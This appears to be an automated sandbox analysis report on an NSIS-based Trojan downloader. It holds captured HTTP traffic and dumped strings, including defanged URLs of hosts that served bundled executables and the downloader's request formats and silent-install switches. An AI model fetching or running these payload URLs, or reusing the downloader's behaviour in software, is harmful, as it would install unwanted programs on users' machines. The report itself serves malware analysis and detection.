Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127232<br>
Content-Range: bytes 21102592-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /0403/help1.html HTTP/1.0<br>
Host: update.aiqingzhihui.com<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sun, 17 Aug 2014 02:21:11 GMT<br>
Content-Length: 654<br>
Content-Type: text/html<br>
Last-Modified: Fri, 11 Jul 2014 09:40:27 GMT<br>
Connection: Close<br>
ETag: "9884ea25ec9ccf1:4ee"<br>
Accept-Ranges: bytes<br>
Server: Microsoft-IIS/6.0<br>
X-Powered-By: ASP.NET<br>
Fw-Via: DISK HIT from ctl-hn-217-175.fcd<br><pre>TRW2VjdF0KOTc9MQo5OD0xCjk5PTEKMTAwPTEKMTAxPTEKMTAyPTEKMTAzPTEKMTA0PTEK<br>MTA1PTEKMTA2PTEKMTA3PTEKMTA4PTEKMTA5PTEKMTEwPTEKMTExPTEKMTEyPTEKMTEzPT<br>EKMTE0PTEKMTE1PTEKMTE2PTEKMTE3PTEKMTE4PTEKMTE5PTEKMTIwPTEKMTIxPTEKMTIy<br>PTEKMTIzPTEKMTI0PTEKMTI1PTEKMTI2PTEKMTI3PTEKMTI4PTEKMTI5PTEKMTMwPTEKMT<br>MxPTEKMTMyPTEKMTMzPTEKMTM0PTEKMTM1PTEKMTM2PTEKMTM3PTEKMTM4PTEKMTQxPTEK<br>MTQyPTEKW3JlY10KMD1odHRwOi8vZG93bi5sYW9jaGVoZS5jb20vMDYxOS9wanl5Xzg5Xz<br>MuZ2lmCltkaXJdCjA9cGp5eV84OV8zLmV4ZQpbZ10KMD0xCltwYV0KMD0xCltpMV0KMD0x<br>CltpMl0KMD3nvo7omJHlm6LotK0KW2kzXQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS<br>9pY28uaWNvCltpNF0KMD1tbXQuaWNvCltpNV0KMD1odHRwOi8vd3d3Lm1laW1vdHVhbi5j<br>b20vP2FxMQpbZWRdCkUwPTE=..</pre></font><br><br
<font color="red">GET /stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: hzs17.cnzz.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Tengine/1.4.1<br>
Date: Sun, 17 Aug 2014 02:21:25 GMT<br>
Content-Type: image/gif<br>
Content-Length: 43<br>
Last-Modified: Tue, 28 May 2013 02:57:17 GMT<br>
Connection: close<br>
Accept-Ranges: bytes<br><pre>GIF89a.............!.......,...........D..;..</pre></font><br><br
<font color="red">GET /downcontainer/downLoadList.do HTTP/1.1<br>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: admin.downloader.re63.cn<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:20:35 GMT<br>
Content-Type: text/html; charset=UTF-8<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Vary: Accept-Encoding<br><pre>2ef..<?xml version='1.0' encoding='UTF-8'?><setup><prod<br>uct id='0' oemId='0' name='guagua' companyName='......' productFullNam<br>e='......' version='5.1.4' /><product id='0' oemId='1' name='gua<br>gua' companyName='......' productFullName='......2' version='5.1.4' /&<br>gt;<product id='0' oemId='2' name='guagua' companyName='......' pro<br>ductFullName='......-............' version='5.1.4' /><product id<br>='0' oemId='3' name='guagua' companyName='......' productFullName='...<br>...-......-............' version='5.1.4' /><product id='0' oemId<br>='4' name='guagua' companyName='......' productFullName='......-......<br>-............' version='5.1.4' /><product id='0' oemId='5' name=<br>'guagua' companyName='......' productFullName='......-......-.........<br>...' version='5.1.4' /></setup>..0..</font>....</pre></font><br><br><font color="red">GET /downcontainer/downLoadForGuaGua.do?recid=77150006814 HTTP/1.1<br>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: admin.downloader.re63.cn<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:20:35 GMT<br>
Transfer-Encoding: chunked<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=21364736-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:13 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 4639568<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127234<br>
Content-Range: bytes 21364736-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /wwwww_3340.zip HTTP/1.0<br>
Host: yunbo.luopf.cn<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Length: 3591824<br>
Content-Type: application/x-zip-compressed<br>
Last-Modified: Thu, 12 Jun 2014 11:07:17 GMT<br>
Accept-Ranges: bytes<br>
ETag: "eae152792e86cf1:32d"<br>
Server: Microsoft-IIS/6.0<br>
Date: Sun, 17 Aug 2014 02:21:04 GMT<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/common/patch/19035267599/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=524288-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:31 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 683232<br>
Connection: close<br>
ETag: 30cbc602ada7cdfb0346038c05996d84<br>
Last-Modified: Wed, 30 Apr 2014 05:22:28 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>
Age: 127253<br>
Content-Range: bytes 524288-1207519/1207520<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DC8389F18378C004A7004B30F60323AD<br>
x-bs-request-id: MTAuNTcuMTIyLjM1OjgwODA6MjM1OTEyNDY2MzoyOC9KdWwvMjAxNCAyMjo1OTowNiA=<br>
x-bs-meta-crc32: 2965621797<br>
Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>
<<< skipped >>>
<font color="red">GET /stat.php?id=2701879&web_id=2701879 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: s6.cnzz.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Tengine<br>
Date: Sun, 17 Aug 2014 02:21:24 GMT<br>
Content-Type: application/javascript<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Last-Modified: Sun, 17 Aug 2014 02:21:24 GMT<br>
<<< skipped >>>
<font color="red">GET /core.php?web_id=2701879&t=z HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: c.cnzz.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Tengine<br>
Date: Sun, 17 Aug 2014 02:21:25 GMT<br>
Content-Type: application/javascript<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Last-Modified: Sun, 17 Aug 2014 02:21:25 GMT<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=491520-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:28 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 432976<br>
Connection: close<br>
ETag: 44edff85d12e091f0b129f05a3f2a042<br>
Last-Modified: Tue, 06 May 2014 07:48:08 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:49 GMT<br>
Age: 127239<br>
Content-Range: bytes 491520-924495/924496<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: 45FD47DB9BA063A62A2F1AF299C66DD6<br>
x-bs-request-id: MTAuNDYuMTU3LjIzOjgwODA6MTU1MDU3MDk3NDoyOC9KdWwvMjAxNCAyMjo1ODo0MyA=<br>
x-bs-meta-crc32: 3569711378<br>
Content-MD5: 44edff85d12e091f0b129f05a3f2a042<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=786432-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>
Date: Sat, 09 Aug 2014 06:25:46 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 786432-924495/924496<br>
Content-Length: 138064<br>
Age: 676482<br>
Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=688128-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>
Date: Sat, 09 Aug 2014 06:25:46 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 688128-924495/924496<br>
Content-Length: 236368<br>
Age: 676483<br>
Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_188:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll
\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll
_dubo_001.exe"
_dubo_001.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
.reloc
.reloc
System.dll
System.dll
callback%d
callback%d
BBB.DDD
BBB.DDD
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
&hXXps://VVV.globalsign.com/repository/03
&hXXps://VVV.globalsign.com/repository/03
"hXXp://crl.globalsign.net/root.crl0
"hXXp://crl.globalsign.net/root.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
&hXXps://VVV.globalsign.com/repository/0
&hXXps://VVV.globalsign.com/repository/0
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0P
-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0P
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt0
4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
{Z%2X
{Z%2X
WL6.VA
WL6.VA
fl.Ll4i
fl.Ll4i
X.OV h
X.OV h
nsi3.tmp
nsi3.tmp
5.exe
5.exe
001.exe"
001.exe"
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
%original file name%.exe
%original file name%.exe
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\erty7
%Program Files%\erty7
1\Temp\nsi3.tmp\hgds8
1\Temp\nsi3.tmp\hgds8
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\updatr
%Program Files%\updatr
adwoca_00005.exe
adwoca_00005.exe
01.exe
01.exe
hXXp://yunbo.luopf.cn/adwoca_00005.zip
hXXp://yunbo.luopf.cn/adwoca_00005.zip
01.zip
01.zip
Nullsoft Install System v2.45
Nullsoft Install System v2.45
2014.07.27.150521
2014.07.27.150521
%original file name%.exe_188_rwx_10004000_00001000:
callback%d
callback%d
guagua_77150006814.exe_1016:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t.Ht4
t.Ht4
.\ConfigDlg.cpp
.\ConfigDlg.cpp
GuaGua\ServiceClient.exe
GuaGua\ServiceClient.exe
Player\DefCamSetup.dll
Player\DefCamSetup.dll
CamerDll:%s
CamerDll:%s
dbghelp.dll
dbghelp.dll
%sddd_ddd.dmp
%sddd_ddd.dmp
CGuaGuaMsgBoxDlg
CGuaGuaMsgBoxDlg
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\%s.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\%s.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
.\ImageMgr.cpp
.\ImageMgr.cpp
Resource%d
Resource%d
FirstImage %s
FirstImage %s
LastImage %s
LastImage %s
Image%d
Image%d
%c:\Program Files\
%c:\Program Files\
.\ProductInfoMgr.cpp
.\ProductInfoMgr.cpp
GetAllProductInfo %d
GetAllProductInfo %d
hXXp://admin.downloader.re63.cn/downcontainer/downLoadList.do
hXXp://admin.downloader.re63.cn/downcontainer/downLoadList.do
log\1.xml
log\1.xml
hXXp://admin.downloader.re63.cn/downcontainer/downLoadForGuaGua.do
hXXp://admin.downloader.re63.cn/downcontainer/downLoadForGuaGua.do
%s?id=%s&recid=%I64d
%s?id=%s&recid=%I64d
%s?recid=%I64d
%s?recid=%I64d
log\2.xml
log\2.xml
installUrl
installUrl
installUrl2
installUrl2
licenseUrl
licenseUrl
LoadConfig %d
LoadConfig %d
App GetProductInfo(%s) Error %d
App GetProductInfo(%s) Error %d
hXXp://img001.com/business/kele.exe
hXXp://img001.com/business/kele.exe
hXXp://img001.com/business/qixi.exe
hXXp://img001.com/business/qixi.exe
hXXp://img001.com/business/qiji.exe
hXXp://img001.com/business/qiji.exe
hXXp://img001.com/business/juxing.exe
hXXp://img001.com/business/juxing.exe
hXXp://img001.com/business/pingguo.exe
hXXp://img001.com/business/pingguo.exe
hXXp://img001.com/business/caihong.exe
hXXp://img001.com/business/caihong.exe
hXXp://d.re71.cn/business/kele.exe
hXXp://d.re71.cn/business/kele.exe
hXXp://d.re71.cn/business/qixi.exe
hXXp://d.re71.cn/business/qixi.exe
hXXp://d.re71.cn/business/qiji.exe
hXXp://d.re71.cn/business/qiji.exe
hXXp://d.re71.cn/business/juxing.exe
hXXp://d.re71.cn/business/juxing.exe
hXXp://d.re71.cn/business/pingguo.exe
hXXp://d.re71.cn/business/pingguo.exe
hXXp://d.re71.cn/business/caihong.exe
hXXp://d.re71.cn/business/caihong.exe
hXXp://VVV.%s.com
hXXp://VVV.%s.com
hXXp://cj.%s.com/downloader/
hXXp://cj.%s.com/downloader/
hXXp://img001.com/business/guagua_setup.exe
hXXp://img001.com/business/guagua_setup.exe
hXXp://img001.com/business/guagua_dance_setup.exe
hXXp://img001.com/business/guagua_dance_setup.exe
GuaGua\GuaGua.exe
GuaGua\GuaGua.exe
Dance\ChatHall.exe
Dance\ChatHall.exe
hXXp://cj.guagua.cn/downloader/
hXXp://cj.guagua.cn/downloader/
ChatHall.exe
ChatHall.exe
UpdateConfig Success%d
UpdateConfig Success%d
hXXp://download.re63.cn
hXXp://download.re63.cn
LoadCookie %d
LoadCookie %d
LoadCookie: RecommendStr=%s
LoadCookie: RecommendStr=%s
%d:%I64d:%d
%d:%I64d:%d
UpdateConfig RecType:%d, RecId:%I64d, Ad:%d
UpdateConfig RecType:%d, RecId:%I64d, Ad:%d
HMAFROMURL
HMAFROMURL
UpdateConfig: SourceUrl=%s
UpdateConfig: SourceUrl=%s
UpdateConfig: WebID=%s
UpdateConfig: WebID=%s
G1.0.0
G1.0.0
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d&insttime=%d&homepage=%d&recinst=%d
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d&insttime=%d&homepage=%d&recinst=%d
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&err=%d
%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&err=%d
rec_type:%d,
rec_type:%d,
rec_ad:%d,
rec_ad:%d,
src_url:%s,
src_url:%s,
web_id:%s,
web_id:%s,
.\ReptThread.cpp
.\ReptThread.cpp
Rept %s Result [%d, %d]
Rept %s Result [%d, %d]
%slog\ddd ddd.log
%slog\ddd ddd.log
.\SetupTool.cpp
.\SetupTool.cpp
CSetupToolApp %d
CSetupToolApp %d
CImageMgr::Instance().LoadFromServer()
CImageMgr::Instance().LoadFromServer()
CImageMgr::Instance().LoadFromServer() Success
CImageMgr::Instance().LoadFromServer() Success
/S /AUTOSTART=%s /COMMENDER_ID=%s /D=%s
/S /AUTOSTART=%s /COMMENDER_ID=%s /D=%s
.\SetupToolDlg.cpp
.\SetupToolDlg.cpp
Launch InstallProgram: %s %s
Launch InstallProgram: %s %s
State=%d
State=%d
nCount=%d,currentImage=%d
nCount=%d,currentImage=%d
GuaGua\ServiceClient.dll
GuaGua\ServiceClient.dll
Call LaunchGuaGua(%s)
Call LaunchGuaGua(%s)
Exec %s [%d]
Exec %s [%d]
-%%
-%%
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\Path.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\Path.cpp
ExecApp %s %s [%d]
ExecApp %s %s [%d]
[%d, %d]: %s
[%d, %d]: %s
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\ColorCheckButton.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\ColorCheckButton.cpp
Checked %d
Checked %d
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\BitmapFile.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\BitmapFile.cpp
CBitmapFile::Open(%s)
CBitmapFile::Open(%s)
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadManager.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadManager.cpp
InternalDownloadFile() break=%d
InternalDownloadFile() break=%d
SupportBreakDownload
SupportBreakDownload
Begin SupportBreakDownload
Begin SupportBreakDownload
End SupportBreakDownload bThreadFinish=%d
End SupportBreakDownload bThreadFinish=%d
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadThread.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadThread.cpp
Begin OnExecute GetUnfinishBytes nId=%d
Begin OnExecute GetUnfinishBytes nId=%d
End OnExecute GetUnfinishBytes nId=%d
End OnExecute GetUnfinishBytes nId=%d
End OnExecute Receive nId=%d
End OnExecute Receive nId=%d
Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\HttpClass.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\HttpClass.cpp
CHttpClass SetOption
CHttpClass SetOption
CHttpClass SetOption Finish
CHttpClass SetOption Finish
GetHttpFile(%s, %s) error: [%d,%d]%s
GetHttpFile(%s, %s) error: [%d,%d]%s
SendHttpMsg %d
SendHttpMsg %d
SendHttpMsg %d %s
SendHttpMsg %d %s
SendHttpMsg(%s) error: [%d,%d]%s
SendHttpMsg(%s) error: [%d,%d]%s
User-Agent: %s
User-Agent: %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
PostHttpMsg(%s) error: [%d,%d]%s
PostHttpMsg(%s) error: [%d,%d]%s
GetHttpFileInfo(%s) error: [%d,%d]%s
GetHttpFileInfo(%s) error: [%d,%d]%s
HttpRangeRequest(%s, %I64d, %I64d) error: [%d,%d]%s
HttpRangeRequest(%s, %I64d, %I64d) error: [%d,%d]%s
HttpRequest(%s) error: [%d,%d]%s
HttpRequest(%s) error: [%d,%d]%s
ReceiveBytes(%d) error: [%d,%d]%s
ReceiveBytes(%d) error: [%d,%d]%s
